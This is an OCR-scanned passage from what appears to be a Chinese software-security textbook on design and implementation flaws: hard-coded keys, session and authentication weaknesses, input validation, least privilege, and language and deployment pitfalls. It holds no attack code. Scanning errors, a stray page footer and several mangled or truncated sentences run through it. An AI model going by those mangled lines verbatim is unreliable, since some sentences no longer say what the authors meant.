2) 依赖 隐蔽 式 安全 

对 于 程序 员 所 以 依赖 的 安全 机 制 来 说 ， 隐 蔽 式 安全 是 很 有 吸引 力 的 。 当 且 仅 当 没有 人 付 
出 足够 的 努力 来 突破 这 种 安全 机 制 的 时 候 ， 密 码 技术 是 用 来 创建 安全 系统 的 一 种 基本 技术 。 
当 双 方 需要 在 像 Intemet 这 样 的 不 安全 通道 上 进行 通信 时 ， 窃 听 就 是 一 种 威胁 ， 而 密码 技术 
可 用 来 应 对 这 种 威胁 。 当 系统 需要 对 用 户 进行 身份 鉴别 时 ， 密 码 技术 可 用 来 安全 地 存储 口令 
或 令 牌 ， 当 要 求 在 像 HITP 这 样 的 无 状态 协议 之 上 维护 会 话 状态 时 ， 密 码 技术 能 够 安全 地 维 
护 会 话 。 然 而 ， 密 码 技术 是 一 种 充满 隐患 的 复杂 技术 。 


3) 编写 到 程序 中 的 密 钥 

密码 技术 的 基本 内 在 法 则 之 一 就 是 密 钥 必须 一 直 作 为 秘密 存在 ， 否 则 整个 密码 系统 就 将 
失效 。 许 多 程序 会 有 这 样 的 需求 : 数据 必须 安全 地 存储 在 磁盘 或 数据 库 中 ;， 可 能 也 有 这 样 的 
需求 : 在 服务 器 和 客户 端 之 间 ， 应 用 程序 之 间 传 递 的 数据 必须 经 加 密 后 传输 。 密 码 系统 不 容 
易 构建 ， 除 非 具有 多 年 密码 技术 的 经 历 ， 否 则 要 想 编写 自己 的 加 密 算法 几乎 是 不 可 能 的 ， 即 
使 使 用 现成 的 密码 技术 也 并 非 易 事 。 密 码 技术 中 最 具 挑 战 性 的 部 分 之 一 就 是 密 钥 的 管理 ， 也 
正 因为 如 此 ， 才 将 密 钥 编写 到 程序 中 。 

密 钥 管理 就 是 保存 密 钥 并 将 密 钥 来 回 传递 以 使 密码 系统 运作 的 过 程 。 程 序 员 往往 遗漏 这 
个 关键 因素 ， 或 者 没有 足够 的 时 间 来 做 好 这 件 事 情 ， 所 以 他 们 将 密 钥 当 成 一 个 静态 值 编 写 到 
应 用 程序 中 ， 并 试图 通过 XOR( 异 或 ) 编 码 或 其 他 二 进 制 匹配 方式 将 整个 值 进行 干 扰 处 理 ， 但 
事实 上 于 事 无 补 。 对 于 任何 拥有 源 代码 或 者 编译 后 的 二 进 制 文件 的 人 来 说 ， 这 样 编写 到 程序 
中 的 密 钥 都 是 可 用 的 。 经 过 少量 的 反 向 工程 ， 攻 击 者 就 可 解密 那些 存储 在 应 用 程序 中 的 数据 
或 从 网 络 中 觉察 到 的 加 密 数据 。 一 条 适用 的 经 验 法 则 是 : 如 果 把 密 钥 编写 到 应 用 程序 中 ， 就 
需要 将 整个 应 用 程序 当 作 秘密 来 对 待 。 但 对 面向 大 量 用 户 分 布 部 署 的 应 用 程序 来 说 ， 这 显然 
是 不 可 行 的 ， 因 为 如 果 这 样 的 话 ， 用 户 就 将 知道 其 他 用 户 的 密 钥 ， 这 正 是 人 们 说 数字 版 权 管 
理 (DRM，Digital Rights Management) 从 根本 上 存在 缺陷 的 原因 。 


4) 错误 地 处 理 私密 信息 

私密 信息 是 指 除了 向 授权 访问 的 用 户 开 放 外 ， 应 用 程序 不 应 该 公开 的 那些 数据 。 诸 如 登 
录 和 密码、 登录 密码 散 列 、 密 钥 以 及 会 话 标识 符 之 类 的 秘密 信息 是 非 公开 数据 中 最 关键 的 信息 ， 
因为 这 些 数据 的 暴露 通常 会 破坏 系统 的 安全 性 。 另 外 一 些 私密 数据 ， 比 如 账户 名 称 、 信 用 卡 
号 以 及 账户 的 收 支 情况 等 ， 这 些 通常 都 是 非常 重要 而 且 需 要 保持 其 私密 性 的 数据 。 系 统 设计 
人 员 应 该 对 系统 的 数据 资产 价值 进行 评审 ， 这 样 除 了 上 述 信息 之 外 的 其 他 有 价值 的 信息 也 就 
不 会 被 公开 了 。 
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对 私密 信息 的 恰当 处 理 就 是 不 要 把 这 些 信息 随意 地 写 到 临时 文件 、 日 志文 件 或 者 交换 磁 
盘 空 间 中 。 保 存 过 私密 数据 的 缓冲 区 应 该 擦 除 ， 这 样 如 果 系 统 为 其 他 用 户 会 话 而 重用 内 存 ， 
后 来 的 用 户 就 不 会 看 到 之 前 他 人 的 私密 信息 。 如 果 数 据 是 写 入 一 个 文件 或 数据 库 中 ， 那 么 应 
该 对 数据 进行 加 密 ， 这 样 即使 系统 安全 性 遭 到 破坏 ， 攻 击 者 也 不 会 得 到 明文 的 私密 信息 。 

2. 对 用 户 及 其 许可 权限 进行 跟踪 


许多 联网 的 应 用 程序 都 需要 跟踪 以 确定 哪个 用 户 与 某 个 事务 相关 联 ， 以 便 在 该 事务 完成 
之 前 ， 应 用 程序 能 够 执行 一 个 授权 步骤 。 如 果 这 个 用 户 未 获得 该 事务 或 该 事务 所 操作 数据 的 
授权 ， 那 么 应 用 程序 必须 犯 一 个 错误 。 


1) 会 话 管理 薄弱 或 缺失 

为 用 户 创建 会 话 后 ， 必 须 对 其 进行 管理 。 典 型 的 情况 是 Web 应 用 程序 通过 为 会 话 分 配 一 
个 不 可 猜测 且 不 可 预知 的 会 话 标识 符 并 将 其 存储 在 Cookie 中 ， 从 而 进行 会 话 的 管理 。 在 会 话 
管理 中 ， 应 使 用 密码 散 列 ， 如 果 会 话 标识 符 使 用 简单 的 增 量 数字 或 者 时 间 惟 的话， 攻击 者 就 
会 猜 出 有 效 的 会 话 标识 符 ， 并 使 用 其 他 用 户 已 经 认证 的 会 话 。 此 外 ， 会 话 标识 符 在 网 络 上 的 
传输 必须 使 用 某 种 加 密 手段 ， 如 SSL。 这 是 因为 ， 如 果 攻 击 者 能 嗅 探 网 络 ， 或 能 有 效 实施 代 
理 攻击 的 话 ， 这 个 攻击 者 就 可 以 访问 到 其 他 用 户 的 会 话 标识 符 。 最 后 ， 应 用 程序 还 必须 不 存 
在 跨 站 点 执行 脚本 漏洞 ， 因 为 这 种 漏洞 可 用 来 窃取 用 户 的 Cookies 


2) 身份 鉴别 薄弱 或 缺失 

由 于 授权 依赖 于 身份 鉴别 ， 故 身份 鉴别 本 身 必 须 是 安全 的 。 用 户 发 送 到 系统 的 密码 必须 
通过 像 SSL 这 样 的 安全 连接 来 传送 ， 这 样 密码 就 不 会 被 中 途 截 取 。 身 份 鉴别 步骤 不 应 存在 被 
绕 过 的 可 能 性 ， 在 系统 开始 慢 下 来 之 前 ， 密 码 的 质量 必须 强制 满足 不 允许 攻击 者 尝试 密码 的 
次 数 超过 三 次 ， 这 样 就 可 以 防止 暴力 攻击 。 


3) 授权 薄弱 或 缺失 
对 于 大 多 数 应 用 程序 来 说 ， 正 确 地 实现 授权 并 非 易 事 。 应 用 程序 中 不 能 存在 让 攻击 者 绕 

过 授权 步骤 并 通过 系统 执行 未 获得 授权 的 事务 的 可 能 性 。 
3. 有 缺陷 的 输入 验证 


缺少 输入 验证 或 输入 验证 存在 缺陷 ， 是 造成 许多 极 严重 漏洞 的 头号 诱因 。 这 些 漏洞 包括 
缓冲 区 溢出 、SQL 注入 以 及 跨 站 点 执行 脚本 。 输 入 验证 非常 关键 ， 必 须 对 其 缺陷 加 以 纠正 ， 
应 该 花 时 间 对 输入 验证 例 程 进行 审查 ， 并 针对 其 正确 性 进行 测试 。 


1) 没有 在 安全 的 上 下 文 环境 中 执行 验证 

许多 客户 端 /服务 器 应 用 程序 都 在 客户 端 执行 输入 验证 ,以 提高 性 能 。 如 果 用 户 输入 了 错 
误 数据 ， 客 户 端 验证 就 可 以 较 快 地 对 数据 进行 验证 ， 而 不 需要 将 数据 通过 网 络 发 送 给 服务 器 
来 完成 验证 工作 ， 这 是 在 客户 端 进行 验证 的 好 理由 。 但 是 ， 如 果 仅 在 客户 端 进行 验证 的 话 ， 
那么 攻击 者 通过 禁用 客户 端 验证 所 在 的 代码 部 分 (如 JavaScripb， 就 可 以 很 容易 地 绕 过 这 个 验 
证 步骤 。 他 使 用 一 个 自 定义 Web 客户 端 或 者 使 用 Web 代理 服务 器 ， 就 可 以 操纵 客户 端的 数 
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据 而 无 须 进行 客户 端 验证 。 


2) 验证 例 程 不 集中 

验证 例 程 不 容易 写 ， 程 序 内 位 于 各 层次 上 的 许多 例 程 会 带 来 复杂 性 ， 难 以 进行 正确 性 审 
查 。 输 入 验证 应 该 尽 可 能 地 在 靠近 用 户 输入 的 位 置 执行 ， 并 且 要 集中 ， 这 样 就 可 以 确保 所 有 
数据 都 会 经 过 验证 例 程 ， 并 能 确保 输入 验证 本 身 的 正确 性 。 应 该 注意 的 是 ， 有 时 简单 地 将 相 
互 关联 的 例 程 进行 集中 ， 会 形成 过 于 简化 的 验证 例 程 ， 最 终 变 得 验证 不 充分 。 当 通过 一 个 验 
证 器 例 程 集 中 对 外 部 数据 流 进行 验证 时 ， 必 须 主 要 保持 严格 的 验证 。 


3) 不 安全 的 组 件 边界 

现在 的 许多 软件 都 是 用 多 个 组 件 来 构建 ， 图 表 控件 就 是 一 个 组 件 的 例子 ， 该 控件 作为 一 
个 数据 库 对 象 ， 用 作 和 数据 库 服务 器 连接 的 接口 。 这 些 都 是 现成 的 对 象 ， 一 般 由 组 件 或 数据 
库 厂商 提供 。 开 发 人 员 往 往 会 将 代码 拆 分 为 多 个 组 件 ， 这 样 就 可 以 在 其 他 软件 项 目 中 重用 ， 
或 者 通过 这 种 组 件 化 的 方法 简化 其 程序 内 部 的 通信 。 例 如 ， 一 个 应 用 服务 器 可 以 有 一 个 配置 
组 件 ， 管 理 员 可 以 使 用 它 通过 独立 于 应 用 服务 的 另 一 个 进程 对 应 用 服务 器 软件 进行 配置 ， 这 
个 组 件 可 以 通过 注入 命名 管道 等 进程 间 通 信 方式 来 与 应 用 服务 器 引擎 进行 通信 。 

组 件 边界 是 指 程序 的 位 置 点 ， 各 组 件 在 这 些 位 置 上 进行 通信 。 典 型 情况 下 ， 组 件 间 的 通 
信 是 通过 TCP/IP 套 接 字 、 命 名 管道 、 文 件 、 共 享 内 存 或 者 通过 远程 过 程 调用 来 完成 。 如 果 不 
对 这 种 通信 通道 进行 身份 鉴别 ， 所 有 的 组 件 间 交 换 的 数据 就 是 潜在 的 政 意 数据 ， 这 是 因为 通 
信 通 道 很 可 能 存在 注入 敌意 数据 的 可 能 。 许 多 组 件 接口 都 假定 组 件 间 通 信 的 数据 经 过 了 验证 
联系 这 一 实际 情况 ， 这 就 使 得 组 件 边界 漏洞 随时 可 能 发 生 。 因 此 ， 对 数据 的 验证 应 该 在 每 一 
个 组 件 边 界 上 孝 执行 ， 这 通常 称 为 “防御 性 编程 ”组 件 边 界 越 多 ， 意味 着 必须 正确 验证 的 输 
入 点 越 多 ， 同 时 也 意味 着 程序 员 出 错 的 几率 也 越 高。 

4. 薄弱 的 结构 性 安全 


攻击 面 就 是 攻击 者 可 能 与 之 进行 交互 的 应 用 程序 边界 。 对 于 大 多 数 应 用 程序 来 说 ， 这 会 
是 应 用 程序 所 具有 的 网 络 接口 ， 不 过 ， 攻 击 面 也 有 可 能 是 文件 系统 、 注 册 表 或 进程 通信 。 应 
用 程序 与 外 部 通信 的 方式 越 多 ， 其 攻击 面 就 越 大 。 一 个 在 两 个 端口 上 对 网 络 进行 监听 的 程序 
通常 就 不 如 在 一 个 端口 上 监听 的 应 用 程序 安全 。 

当然 ， 攻 击 面 的 大 小 不 仅 是 数量 问题 ， 还 与 攻击 面 如 何 实现 有 关 。 对 于 一 个 程序 来 说 ， 
如 果 在 执行 安全 性 功能 (如 身份 鉴别 、 授 权 或 输入 验证 ) 之 前 执行 的 数据 输入 处 理工 作 越 多 ， 
那么 其 攻击 面 就 越 大 。 在 执行 上 述 安全 性 功能 之 前 ， 对 数据 进行 大 量 的 解析 或 进行 计算 ， 就 
意味 着 会 有 更 多 代码 ， 就 会 存在 更 多 攻击 者 可 访问 的 漏洞 的 可 能 性 。 

当 一 个 漏洞 被 利用 时 ， 攻 击 者 无 论 是 执行 任意 代码 或 者 是 操作 该 系统 的 文件 系统 ， 其 动 
作 都 是 以 那个 存在 漏洞 的 运行 进程 所 具有 的 权限 来 执行 的 。 这 就 是 攻击 者 力求 找 出 那些 运行 
于 高 权限 级 别 的 软件 (UNIX 系统 上 以 root 级 别 运 行 ， 而 Windows 系统 上 以 administrator 或 
SYSTEM 权限 级 别 运行 ) 的 漏洞 ， 并 对 其 加 以 利用 的 原因 。 以 尽 可 能 小 的 权限 级 别 运行 来 达 
到 软件 所 需 ， 这 样 即使 出 现 漏洞 并 被 利用 ， 也 可 以 限制 其 带 来 破坏 的 影响 。 

安全 设计 的 基本 内 在 法 则 之 一 就 是 不 要 依赖 一 种 机 制 来 实现 安全 性 ， 因 为 那 种 机 制 可 能 
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会 失效 ， 应 该 并 用 多 种 相互 独立 的 安全 机 制 。 银 行 的 物理 安全 是 实现 生活 中 纵深 防御 的 一 个 
例子 : 金库 不 把 门 开 在 大 街 上 ， 银 行 有 一 个 带 锁 的 前 门 ， 一 个 带 锁 的 室内 门 ， 而 后 才 是 最 后 
的 金库 大 门 。 每 一 层 门 上 都 安装 了 安全 摄像 机 和 警报 器 ， 在 两 门 之 间 ， 房 间 内 可 能 还 会 有 移 
动物 体 传感器 。 这 些 安全 机 制 的 任何 一 种 都 可 能 失效 ， 但 整个 安全 系统 仍然 可 以 用 来 降低 银 
行 遭 抢劫 的 风险 。 

当 为 应 用 程序 设计 降低 安全 威胁 的 措施 时 ， 设 计 人 员 应 该 使 用 多 种 机 制 与 安全 威胁 抗 
衡 。 对 于 SQL 注入 威胁 ， 设 计 人 员 应 该 使 用 输入 过 滤 来 确保 数据 (可 能 最 终 会 作为 SQL 查询 
的 一 部 分 ) 格 式 良好 。 此 外 ， 还 应 该 使 用 存储 的 预先 准备 的 语句 ， 这 些 语句 汇集 了 所 有 查询 的 
变量 。 应 该 对 敏感 数据 进行 加 密 ， 这 样 即使 攻击 者 获得 了 数据 访问 权 , 他 也 需要 正确 的 密 钥 。 
事务 处 理应 该 在 日 志 中 记录 IP 地 址 ， 另 外 ， 如 果 可 能 的 话 ， 还 应 该 记录 与 之 关联 的 用 户 名 。 
引入 到 软件 中 的 每 种 威胁 缓解 措施 都 有 其 局 限 性 ， 还 有 可 能 存在 缺陷 。 但 如 果 使 用 了 纵深 防 
i, 软件 即使 面临 着 某 项 威胁 缓解 措施 的 失效 ,也 仍 将 是 安全 的 。 除 非 攻击 者 窃 得 身份 凭证 ， 
否则 他 很 可 能 会 企图 让 应 用 程序 去 做 那些 设计 中 原本 不 打算 做 的 事情 。 这 种 非 预期 的 功能 主 
要 来 源 就 是 错误 处 理 代码 ， 这 些 代码 往往 在 设计 和 测试 方面 有 所 不 足 。 作 为 一 个 安全 测试 人 
员 ， 应 该 重视 错误 处 理 代码 ， 因 为 程序 的 大 部 分 输入 都 将 试图 使 得 程序 不 去 执行 其 预定 的 功 
能 。 如 果 程 序 不 能 做 到 对 任何 输入 都 统统 非常 得 体 地 应 对 ， 那 么 攻击 者 就 会 利用 错误 处 理 程 
序 例 程 中 的 非 预 期 功能 来 改变 程序 的 执行 。 

另 一 个 错误 处 理 问题 就 是 ， 如 何 报告 错误 情况 而 不 会 暴露 为 攻击 活动 提供 指引 的 系统 相 
关 信 息 。 错 误 消 息 中 往往 包含 堆栈 跟踪 信息 、 目 录 信息 以 及 软件 所 连接 的 软件 组 件 或 服务 的 
版 本 信息 等 。 软 件 应 将 错误 细节 记录 到 管理 员 可 以 读 取 的 日 志文 件 中 ， 并 只 是 简单 地 告诉 用 
户 发 生 了 一 个 错误 。 

5. 其 他 设计 缺陷 


多 层 应 用 程序 往往 会 在 一 个 进程 之 间 传 送 命令 或 其 他 解释 性 代码 。 如 果 攻 击 者 能 够 找 出 
修改 这 类 代码 的 途径 ， 那 么 他 就 会 找到 办 法 来 修改 应 用 程序 的 执行 。Web 应 用 服务 器 是 一 个 
常见 的 例子 ， 它 会 向 Web 客户 端 发 送 JavaScript 代码 来 执行 客户 端 呈现 或 者 客户 端 验证 ， 另 
一 个 例子 是 向 数据 库 服务 器 发 送 SQL 查询 的 应 用 服务 器 。 

应 用 程序 在 设计 时 应 该 将 用 户 提供 的 数据 和 程序 自己 执行 或 传 给 其 他 系统 执行 的 代码 
进行 隔离 。 代 码 是 静态 时 ， 要 实现 上 述 目标 十 分 简单 ， 但 这 些 代码 往往 是 使 用 用 户 数 据 来 生 
成 的 ， 如 果 是 这 种 情况 ， 就 必须 要 小 心地 将 用 户 数据 加 以 净化 处 理 (去 除 其 中 的 有 害 成 分 )。 
这 样 ， 就 可 以 避免 攻击 者 修改 由 用 户 数据 生成 的 代码 而 控制 部 分 系统 的 执行 。 

应 用 程序 中 输入 的 每 一 份 数据 都 可 能 是 潜在 的 危险 之 源 。 软 件 设计 人 员 往 往 清楚 地 知道 
需要 对 用 户 输入 的 数据 保持 警觉 。 然 而 ， 他 们 却 经 常 忘记 应 该 对 应 用 程序 的 所 有 外 部 数据 都 
保持 警觉 。 这 也 许 源 于 一 种 旧 观 念 ， 那 就 是 人 的 输入 是 会 出 错 的 ， 所 以 必须 对 其 构建 防护 措 
施 。 而 由 其 他 进程 或 者 系统 输入 的 数据 是 由 计算 机 生成 的 ， 所 以 格式 良好 ,并 且 也 是 安全 的 。 
这 种 安全 的 错觉 是 假定 不 会 有 恶意 参与 者 欺骗 外 部 系统 或 者 这 些 系统 被 攻陷 的 情况 。 当 发 生 
这 种 情况 时 ， 从 外 部 系统 输入 到 应 用 程序 中 的 数据 就 和 用 户 输入 一 样 危 险 。 因 此 ， 必 须 将 所 
有 外 部 输入 都 当做 危险 的 ， 并 对 其 做 净化 处 理 ， 以 去 除 其 中 的 有 害 数据 。 
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即使 使 用 经 过 净化 的 数据 ， 也 必须 多 加 小 心 ， 不 要 在 数据 中 赋予 任何 未 经 保证 的 信任 。 
如 果 可 能 ， 要 对 外 部 系统 进行 认证 。 对 于 那些 可 匿名 访问 的 外 部 系统 (如 域名 服务 器 )， 就 不 
能 依赖 其 数据 来 做 任何 安全 方面 的 判定 ， 即 使 这 些 数据 对 记录 日 志 很 有 用 。 但 不 应 该 让 攻击 
者 借 之 对 外 部 系统 施加 控制 以 使 得 应 用 程序 做 出 其 他 安全 判定 。 

在 一 个 多 层次 系统 中 ， 应 用 程序 跨越 多 个 服务 器 而 运行 ， 每 个 服务 器 都 应 该 对 其 他 服务 
器 进行 认证 。 而 且 如 果 可 行 的 话 ， 最 好 使 用 加 密 措施 来 阻止 假冒 和 代理 攻击 。 在 一 次 假冒 攻 
击 中 ， 攻 击 者 会 用 一 个 看 起 来 相像 的 服务 器 来 代替 原始 服务 器 ， 但 是 这 个 新 的 服务 器 却 被 攻 
击 者 控制 。 这 种 攻击 可 通过 修改 所 使 用 的 域名 系统 或 者 修改 网 络 层 来 完成 。 代 理 攻 击 和 假冒 
攻击 类 似 ， 只 不 过 代理 攻击 使 用 了 一 个 代理 服务 器 ， 利 用 它 仅 对 影响 攻击 的 数据 进行 修改 。 

应 用 程序 应 该 总 是 以 安全 的 操作 模式 作为 其 默认 值 ， 不 应 要 求 使 用 的 时 候 更 改 配置 来 使 
之 安全 ， 因 为 这 种 更 改 经 常 被 遗忘 或 者 不 能 被 正确 地 执行 。 攻 击 者 就 以 这 种 不 安全 的 默认 配 
置 为 攻击 目标 ， 因 为 他 们 知道 ， 许 多 系统 都 是 以 这 种 默认 的 方式 来 部 署 的 。 

最 后 ， 审 计 日 志 是 安全 的 应 用 程序 之 基本 要 素 。 有 了 审计 日 志 ， 就 能 够 查 明 攻 击 行为 。 


4.5.3 ”编程 语言 的 实现 问题 


每 种 编程 语言 都 有 其 特质 ， 如 果 在 编写 代码 的 过 程 中 对 此 没有 理解 且 没 有 进行 相应 的 处 
理 ， 就 会 存在 缺陷 。 程 序 员 必须 避免 使 用 某 些 编程 语言 的 元 素 或 其 编程 环境 ， 以 避免 造成 实 
现 缺 陷 。 而 其 他 一 些 编程 语言 元 素 , 也 只 有 在 理解 其 安全 含义 的 用 法 时 ,才能 被 安全 地 使 用 。 

1. 编译 型 语言 : C/C++ 


在 安全 领域 中 ， 存 在 大 量 安全 漏洞 ， 而 产生 这 些 安 全 漏洞 的 原因 可 追溯 到 C/C++ 的 不 安 
全 使 用 。C 语言 是 作为 “底层 ”和 可 移植 的 语言 而 设计 的 ， 这 就 使 得 操作 系统 易于 用 C 语言 
来 编写 ， 而 现今 所 有 流行 的 OS 都 是 用 C 语言 来 编写 的 。 在 这 些 操作 系统 上 ， 其 本 地 接口 也 
是 用 C 语言 编写 的 ， 故 许多 在 这 些 系统 上 运行 的 应 用 程序 为 了 获得 较 高 的 执行 性 能 ， 也 都 使 
Hi C 和 C++ 语言 来 编写 。 由 于 C 语言 在 历史 上 具有 比 任何 编程 语言 都 要 多 的 安全 相关 问题 
Hi C 和 C++ 语言 来 编写 应 用 程序 也 就 带 来 了 问题 。 此 外 ， 大 部 分 构成 Intemet“ 管 件 ” 的 软 
件 一 一 域名 服务 器 、 邮 件 服务 器 、Web 服务 器 、 路 由 器 软件 甚至 于 防火 墙 软件 等 ， 都 是 用 C 
或 C++ 语言 编写 的 ， 所 以 说 Intemet 上 有 很 多 安全 问题 一 点 都 不 为 过 。 遗 留 软件 是 人 们 仍 使 
用 C 语言 的 另 一 个 原因 ， 这 些 软件 只 是 一 直 在 增加 一 些 新 的 功能 特性 ， 并 持续 地 重复 利用 。 

在 C/C++ 代码 中 发 现 的 一 些 常见 安全 问题 主要 有 : 

1) C 语言 没有 安全 的 本 地 字符 串 类 型 ， 也 没有 安全 而 易 用 的 字符 串 处 理 函 数 ， 

2) 缓冲 区 超 限 会 覆盖 栈 中 的 函数 返回 地 址 ; 

3) 预防 缓冲 区 溢出 ; 

4) printf 类 型 的 格式 化 函数 ; 

5) 整数 溢出 。 

2. 解释 型 语言 : Shell 脚本 和 PHP 


通过 创建 一 个 “增强 ”环境 ， 使 得 许多 操作 可 以 在 默认 的 情况 下 “幕后 ”进行 ， 脚 本 语 


第 4 章 ， 代 码 安全 静态 分 析 "143 。 


言 (如 用 于 UNIX 的 shell 脚本 或 用 于 Web 应 用 程序 的 PHP) 使 得 程序 编写 更 加 容易 。 这 种 方便 
性 是 通过 将 程序 员 与 操作 系统 环境 固有 的 细节 相 分 离 来 实现 的 。 通 过 这 种 隔离 方法 ， 节 省 了 
编程 时 间 ， 也 有 助 于 使 程序 独立 于 操作 系统 。 这 种 隐 含 的 功能 会 对 安全 性 产生 影响 ， 因 而 ， 
要 安全 地 使 用 脚本 语言 ， 就 必须 理解 这 种 影响 。 

脚本 语言 都 是 “高 级 ”语言 。 由 于 使 用 动态 内 存 管理 为 变量 分 配 内 存 空间 ， 程 序 员 不 需 
要 管理 内 存 分 配 、 回 收 以 及 数据 复制 (如 字符 串 复 制 ) 的 底层 细节 。 其 好 处 就 是 许多 困扰 C/C++ 
的 缓冲 区 溢出 问题 都 不 存在 了 。 最 常见 的 缓冲 区 溢出 源 自 C/C++ 代码 ， 其 中 涉及 字符 串 处 理 
的 时 候 尤其 如 此 。 而 像 Perl 和 PHP 这 样 的 脚本 语言 ， 发 生 缓冲 区 溢出 的 风险 相对 较 小 ,但 这 
也 并 不 是 说 使 用 脚本 语言 或 者 Java 的 时 候 就 不 需要 检查 输入 长 度 。 因为 这 类 语言 中 仍然 还 有 
可 能 将 字符 串 变量 传递 给 其 他 应 用 程序 ， 这 就 容易 引发 缓冲 区 溢出 。 

某 些 情况 下 ， 变 量 仅仅 是 “经 过 ”一 个 程序 。 例 如 ， 可 编写 一 段 这 样 的 Perl 脚本 ， 它 接 
受 一 个 窗 体 输入 ， 比 如 一 个 用 户 名 ， 然 后 只 简单 地 将 这 个 输入 值 交 给 另 一 个 程序 ， 而 这 个 程 
序 可 能 是 用 C++ 编写 的 或 者 是 操作 系统 自 带 的 。 上 述 的 第 二 个 程序 会 容易 产生 缓冲 区 溢出 ， 
所 以 攻击 者 仍 可 能 搞 破 坏 。 只 是 这 个 问题 不 会 影响 Perl 脚本 ， 因 为 在 这 里 它 只 是 将 输入 中 转 
传递 了 一 下 。 因 此 ， 无 论 使 用 何 种 语言 或 何 种 函数 ， 永 远 要 对 输入 长 度 进行 检查 。 

3. 虚拟 机 语言 : Java 和 C# 


编译 为 字 节 码 并 需要 虚拟 机 来 运行 的 语言 ， 通 常 来 讲 比 编译 成 本 机 代码 的 语言 更 安全 一 
些 。Java 和 C# 就 是 被 设计 为 编译 成 字 节 码 的 编程 语言 的 典型 ， 这 种 编程 语言 在 设计 的 时 候 ， 
就 一 直 牢记 C 语言 的 风险 史 。Java 和 C# 强 化 了 输入 安全 ， 这 意味 着 它们 不 能 访问 任意 的 内 
存 位 置 。 如 果 一 个 Java 程序 试图 超过 数组 边界 来 访问 一 个 数组 ， 就 会 抛 出 一 个 异常 。 而 如 果 
程序 用 C 语言 来 做 这 个 操作 的 话 ， 就 能 对 内 存 进 行 读 、 写 操作 。 


45. 平台 的 实现 问题 


平台 就 是 程序 在 其 中 运行 的 环境 。 操 作 系 统 是 其 主要 的 组 成 部 分 ， 但 平台 还 可 以 包括 程 
序 与 之 交互 的 一 些 常用 的 组 件 。 每 种 操作 系统 都 有 其 特质 ， 对 此 必须 理解 ， 以 免 产 生 不 必要 
的 负面 效应 而 导致 出 现 安全 漏洞 。 

程序 依赖 操作 系统 来 与 用 户 、 网 络 以 及 文件 系统 进行 输入 和 输出 的 交互 ， 还 要 依赖 操作 
系统 来 产生 新 的 子 进程 以 及 与 其 他 进程 进行 通信 。 从 安全 观点 看 ， 所 有 这 些 操作 都 是 很 有 风 
险 的 。 一 个 设计 完善 的 操作 系统 会 清除 默认 行为 ， 提 供 文档 来 说 明 安 全 访问 操作 系统 的 API 
或 服务 的 方式 ， 并 且 指 导 程序 员 编 写 安全 程序 。 遗 憾 的 是 ， 操 作 系 统 开 发 人 员 没 有 想 透 或 者 
没有 提供 文档 来 说 明 许多 现代 操作 系统 的 隐 含 的 安全 问题 ， 比 如 符号 连接 、 目 录 人 遍历、 字符 
转换 等 。 隐 含 的 安全 问题 就 留 给 了 漏洞 研究 人 员 来 发 现 。 


4.5.5 ”常见 的 应 用 程序 安全 实现 问题 


在 任何 平台 上 使 用 任何 语言 编写 程序 ， 某 些 应 用 程序 的 安全 问题 都 会 出 现 。 其 中 某 些 问 
题 是 由 应 用 程序 的 某 个 组 件 接受 的 恶意 数据 引起 的 ， 这 种 数据 在 应 用 程序 的 另 一 个 组 件 被 当 
成 合法 的 代码 。 另 一 些 安全 问题 是 由 于 对 涉 密 信 息 的 不 当 处 理 造成 的 ， 这 些 涉 密 信 息 必 须 保 
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持 其 作为 秘密 的 特征 ， 并 且 要 用 不 可 预测 的 密码 系统 来 履行 加 密 的 使 命 。 常 见 的 应 用 程序 安 
全 实现 问题 有 SQL 注入 和 跨 站 点 执行 脚本 。 


45.6 ”开发 过 程 中 的 问题 及 部 署 方面 的 薄弱 性 


在 开发 过 程 中 遇 到 的 问题 主要 有 : 

。 安全 需求 和 前 提 条 件 的 文档 记录 贫乏 ; 

。 交流 和 文档 的 项 乏 

。 在 开发 过 程 中 缺少 安全 过 程 。 

部 署 是 指 拿 到 软件 ， 并 将 其 在 产品 系统 上 进行 安全 和 配置 的 过 程 。 这 既 可 以 由 定制 应 上 
程序 的 企业 内 部 IT 员工 来 完成 , 也 可 以 由 使 用 打包 的 软件 产品 的 最 终 消费 者 来 完成 。 在 这 两 
种 情况 下 ， 部 署 软件 的 人 ， 都 不 属于 开发 团队 ， 他 们 需要 通过 文档 或 者 安全 和 配置 程序 的 指 
导 来 安装 软件 。 

开发 人 员 在 开发 过 程 中 会 设想 软件 怎样 去 部 署 。 他 们 往往 会 假定 软件 所 使 用 的 文件 和 注 
册 表 键 值 只 会 由 这 个 软件 修改 ， 而 文件 和 注册 表 的 访问 控制 机 制 需要 恰当 地 进行 设置 ， 以 保 
护 配 置 文件 和 注册 表 不 会 被 算 改 。 当 出 现 文件 和 注册 表 键 值 设 置 为 完全 可 写 ， 这 就 意味 着 该 
系统 上 的 所 有 用 户 都 可 以 对 其 进行 更 改 。 如 果 开 发 人 员 假 定 配置 文件 总 是 格式 良好 的 ， 原因 是 
它 只 能 被 这 个 软件 本 身 修改 ， 那 么 开发 人 员 或 许 就 会 放弃 有 效 性 验证 的 代码 。 如 果 攻 击 者 发 现 
了 这 个 许可 权限 的 薄弱 性 ， 他 就 可 以 算 改 这 个 文件 ， 企 图 由 这 个 软件 引入 错误 的 处 理 ， 而 这 个 
软件 会 假定 这 种 修改 仍然 是 格式 完好 的 数据 。 将 文件 的 许可 权限 设置 为 “前 提 条 件 在 部 署 配置 
中 都 成 立 ” 为 确保 这 些 前 提 条 件 都 符合 ， 建 议 用 文档 记录 这 些 前 提 条 件 ， 然 后 进行 核查 。 

部 署 方面 的 另 一 个 主要 问题 就 是 将 软件 安装 为 运行 时 具有 不 必要 权限 的 情况 。 许 多 开发 
人 员 在 构建 软件 时 都 图 方便 ， 所 以 他 们 构建 的 软件 需要 以 UNIX 上 的 root 用 户 或 者 Windows 
上 的 本 地 系统 用 户 的 身份 来 运行 。 这 些 账户 都 是 系统 中 具有 最 高 权限 的 用 户 ， 因 此 如 果 这 个 
软件 有 漏洞 ， 并 且 被 发 现 利用 的 话 ， 攻 击 者 就 能 获得 对 整个 系统 的 完全 控制 权 ， 这 是 当今 许 
多 服务 器 软件 产品 中 存在 的 主要 问题 。 即 使 开发 人 员 耗 费 大 量 的 时 间 来 构建 软件 ， 以 确保 软 
件 可 以 最 低 权 限 的 用 户 身份 来 执行 ， 但 很 多 部 署 脚本 依然 将 软件 的 运行 身份 设置 成 了 root, 
或 者 安装 这 个 软件 的 用 户 将 其 安装 为 以 root 身份 运行 ， 而 没有 考虑 其 中 隐 含 的 安全 问题 。 
